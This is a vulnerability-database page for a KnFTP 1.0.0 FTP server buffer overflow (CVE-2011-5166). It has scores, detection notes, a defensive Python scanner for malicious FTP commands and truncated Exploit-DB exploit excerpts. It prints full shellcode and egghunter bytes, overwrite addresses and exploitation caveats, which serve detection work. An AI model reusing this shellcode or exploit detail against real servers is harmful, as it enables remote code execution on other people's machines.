CVE-2011-5166
Published 2012-09-15

Multiple stack-based buffer overflows in KnFTP 1.0.0 allow remote attackers to execute arbitrary code via a long string to the (1) USER, (2) PASS, (3) REIN, (4) QUIT, (5) PORT, (6) PASV, (7) TYPE, (8) STRU, (9) MODE, (10) RETR, (11) STOR, (12) APPE, (13) ALLO, (14) REST, (15) RNFR, (16) RNTO, (17) ABOR, (18) DELE, (19) CWD, (20) LIST, (21) NLST, (22) SITE, (23) STST, (24) HELP, (25) NOOP, (26) MKD, (27) RMD, (28) PWD, (29) CDUP, (30) STOU, (31) SNMT, (32) SYST, and (33) XPWD commands.

Priority: P3 (55) · Severity: high · CVSS 2.0 base score: 7.5 · Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available (see the Exploit-DB entries below)
EPSS: 6.48% (92.9th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| elif_keir | knftp | — | — |
Detection & IOCs (extracted from sources)

Byte pattern (shellcode from the public Python exploit; see the Exploit-DB entry below):
\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18\x9c\x61

Byte pattern (egghunter; contains the W00T tag bytes referenced in the detection notes):
\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7

Detection notes:
- Detect oversized FTP command arguments: alert on any FTP command (USER, PASS, RETR, STOR, MKD, PWD, CWD, etc.) whose argument exceeds ~271 bytes, the documented shellcode buffer space.
- Detect the W00T egghunter tag in FTP traffic; the double tag 'W00TW00T' (bytes \x54\x30\x30\x57\x54\x30\x30\x57) in a PASS command payload is a strong indicator of exploitation.
- Monitor FTP PASS commands containing large NOP sleds (\x90 repeated) followed by shellcode bytes, which indicate stack-based buffer overflow exploitation against KnFTP.
- Flag FTP sessions sending 9000+ byte buffers to any FTP command (e.g., PWD); this is the documented crash/DoS payload size for the KnFTP SEH overwrite.
- knftpd.exe is the only non-SafeSEH module in KnFTP; process-level monitoring for knftpd.exe spawning unexpected child processes (e.g., calc.exe, cmd.exe) indicates successful exploitation.
- Vulnerable FTP commands include MKD, LS (NLST), ABOR, CD (CWD), APPE, REST, and PWD; monitor all of these for abnormally long arguments on port 21.

Caveats:
- ROP gadget addresses and .data section addresses are specific to the Windows XP SP2/SP3 Spanish and Windows 7 Professional SP1 Spanish builds of msvcrt.dll; they will not apply to other language versions or patch levels.
- The JMP ESP EIP overwrite address (0x7C874413 in kernel32.dll) is specific to Windows XP SP3; it will differ on other OS versions or service packs.
- The DoS/SEH PoC was tested with DEP disabled; exploitation reliability changes when DEP is enabled (the Metasploit module specifically addresses DEP bypass via ROP).
- The exploit overwrites EIP with smaller payloads but switches to an SEH overwrite with larger payloads; detection thresholds should account for both overflow sizes.
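As an added example (not part of this record or of any of the listed exploits), the following Python applies the detection notes above to raw FTP command lines: it flags any argument longer than 271 bytes, the 9000-byte SEH-size buffer, the W00TW00T tag bytes, and a NOP sled. The 16-byte NOP-sled threshold and the sample session are constructed for this example; the byte values and size thresholds come from the notes on this page.

```python
from __future__ import annotations
import re

# Thresholds and byte values taken from the detection notes on this page.
SHELLCODE_SPACE = 271      # usable shellcode space documented for the EIP overwrite
SEH_CRASH_SIZE = 9000      # buffer size documented for the SEH-overwrite PoC
EGG_TAG = b"\x54\x30\x30\x57" * 2   # 'W00TW00T' double tag as quoted in the notes
# Assumption for this example: 16 or more consecutive 0x90 bytes counts as a NOP sled.
NOP_SLED = re.compile(rb"\x90{16,}")


def parse_command(line: bytes) -> tuple[bytes, bytes]:
    """Split one raw client->server FTP line into (VERB, argument bytes).

    Only the trailing CRLF is stripped; the argument is kept byte-for-byte so
    that binary payloads (NOPs, shellcode) are inspected exactly as sent.
    """
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    return verb.upper(), arg


def inspect_command(line: bytes) -> list[tuple[str, str]]:
    """Return (verb, reason) findings for one FTP command line; empty if benign."""
    verb, arg = parse_command(line)
    name = verb.decode("ascii", errors="replace")
    findings: list[tuple[str, str]] = []
    # Length checks apply to every verb, since the advisory lists 33 vulnerable commands.
    if len(arg) >= SEH_CRASH_SIZE:
        findings.append((name, "seh_size_arg"))
    elif len(arg) > SHELLCODE_SPACE:
        findings.append((name, "oversized_arg"))
    if EGG_TAG in arg:
        findings.append((name, "egg_tag"))
    if NOP_SLED.search(arg):
        findings.append((name, "nop_sled"))
    return findings


def scan_session(lines: list[bytes]) -> list[tuple[int, str, str]]:
    """Run inspect_command over a whole session; returns (line index, verb, reason)."""
    return [(i, verb, reason)
            for i, line in enumerate(lines)
            for verb, reason in inspect_command(line)]


# Constructed sample session (not captured traffic): three benign lines, four suspicious.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"PWD\r\n",
    b"USER " + b"A" * 300 + b"\r\n",                            # above the 271-byte space
    b"PASS " + b"\x90" * 32 + b"\xcc" * 64 + b"\r\n",            # NOP sled plus filler bytes
    b"PASS " + b"\x54\x30\x30\x57" * 2 + b"\xcc" * 16 + b"\r\n",  # W00TW00T tag
    b"PWD " + b"A" * 9000 + b"\r\n",                             # SEH-overwrite size
]

if __name__ == "__main__":
    for idx, verb, reason in scan_session(SAMPLE_SESSION):
        print(f"line {idx}: {verb} flagged: {reason}")
```

The length check is deliberately verb-agnostic: the advisory lists 33 affected commands, so keying the rule on a short verb list would miss variants. The tag and NOP-sled checks are applied to every verb for the same reason, even though the notes describe them in PASS payloads.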
No detection rules found.
Exploit-DB · 2011-11-07
KnFTP 1.0 - Remote Buffer Overflow (DEP Bypass) (Metasploit)
---
```text
#module for metasploit framework, for more information
#see the Description.
#Copyright (C) October 04th 2011
#Author: Javier Aguinaga (pasta) el.tio.pastafrola[at]gmail.com
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#alon
```
Exploit-DB · 2011-09-19
KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow
---
```text
# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit,'USER' command
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
#!/usr/bin/perl
use IO::Socket;
# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command.
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
print "\n#----[ mr.pr0n ]---------------------------------------------------------#\n";
print "# Target App: KnFTP 1.0.0 Server #\n";
print "# Attack : Remote Buffer Overflow Exploit - 'USER' command #\n";
print "# Target OS : Windows XP Pro En
```
Exploit-DB · 2011-09-18
KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)
---
```text
#!/usr/bin/python
# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/
# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable. Even commands
# that the server doesn't support. SEH and/or EIP gets overwritten.
# It's almost like this application was made to be vulnerable.
# Anyway have fun.
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX
```
Exploit-DB · 2011-09-12
KnFTP Server - Remote Buffer Overflow
---
```text
#!/usr/bin/python
# tested on windows xp sp3
# overwrites EIP
# seh is overwritten with larger payloads
# knftpd.exe is the only non safeseh module
import sys,socket
print "\n====================="
print "KnFTP Buffer Overflow"
print " Written by Blake "
print "=====================\n"
if len(sys.argv) !=3:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
target = sys.argv[1]
port = int(sys.argv[2])
# 271 bytes of space for shellcode
# 227 bytes windows/exec CMD => calc.exe
shellcode =(
"\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8"
"\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19"
"\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49"
"\x5e\xc
```
No writeups or analysis indexed.
References:
- http://archives.neohapsis.com/archives/bugtraq/2011-09/0015.html
- http://secunia.com/advisories/45907
- http://www.exploit-db.com/exploits/17819
- http://www.exploit-db.com/exploits/17856
- http://www.exploit-db.com/exploits/17870
- http://www.exploit-db.com/exploits/18089
- http://www.osvdb.org/75147
- https://exchange.xforce.ibmcloud.com/vulnerabilities/69557